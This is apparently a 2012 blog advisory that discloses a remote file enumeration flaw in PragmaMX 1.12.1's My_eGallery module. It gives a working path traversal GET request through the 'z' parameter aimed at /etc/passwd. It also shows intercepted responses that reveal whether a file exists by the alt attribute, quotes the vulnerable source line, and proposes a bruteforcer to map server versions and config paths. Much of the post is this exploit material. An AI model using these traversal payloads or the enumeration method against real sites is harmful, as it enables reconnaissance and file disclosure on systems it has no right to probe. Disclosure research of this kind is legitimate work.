Sunday, 18 March 2012
[EN] PragmaMX 1.12.1 - remote file enumeration
# TITLE ....... # PragmaMx 1.12.1 remote file enumeration ......................................... #
# DATE ........ # 15.03.2012 ...................................................................... #
# AUTOHR ...... # http://hauntit.blogspot.com ..................................................... #
# SOFT LINK ... # http://pragmamx.org ............................................................. #
# VERSION ..... # 1.12.1 .......................................................................... #
# TESTED ON ... # LAMP ............................................................................ #
# ................................................................................................. #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#..........................................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)
#..........................................................#
# 2. What is the type of vulnerability?
This is "remote file enumeration" bug.
After some fuzzing tests I found nice behavior of new PragmaMX.
The "correct functionality" is z-parameter is handling image filename.
I've done something else. I pointed 'filename' to 'other file in file system',
for example /etc/passwd.
#..........................................................#
# 3. Where is bug :)
Vulnerable is "z" parameter.
If we send GET like this:
http://pragmamx.1.12.1/html/modules.php?name=My_eGallery&file=image&z=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&width=295&height=420
our response should looke like:
...cut.from.Burp...
(...)
<head>
<title>/etc/passwd</title>
</head>
<body style="margin: 0; padding: 0;">
<img src="../../../../../../../../../../../../etc/passwd" width="295" height="420" alt="/etc/passwd" /> </body>
</html>
...cut.from.Burp...
This will be an answer "if remote file is there". By "there" I mean localization-of-file-You-point.
If there won't be a file You choosed, answer will be something like:
(GET:
http://pragmamx.1.12.1/html/modules.php?name=My_eGallery&file=image&z=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswdlalala.txt&width=295&height=420
)
...cut.from.Burp...
<head>
<title></title>
</head>
<body style="margin: 0; padding: 0;">
<img src="../../../../../../../../../../../../etc/passwdlalala.txt" width="295" height="420" alt="" /> </body>
</html>
...cut.from.Burp...
So the difference is in "alt" tag in answer.
If in remote server we can 'find a file x', then this 'x' name will be presented in HTTP response.
If in remote localization we can not find a file (x), then output (alt tag) should be blank.
This vulnerability can be used to:
a) check for some other lfi/rfi-based attacks
b) write a bruteforcer to determine OS/PHP-version, get paths of configs, etc...
And here will be more:
./modules/My_eGallery/image.php:19:$img = (isset($_GET['z']) && is_string($_GET['z'])) ? $_GET['z'] : '';
#..........................................................#
# 4. More...
- http://www.pragmamx.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
#..........................................................#
# 5. Mail me, I'm still looking for a new projects... ;)
#............................................#
# Best regards
#
Labels:
0day,
exploit,
pragmamx,
research,
vulnerability
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment
What do You think...?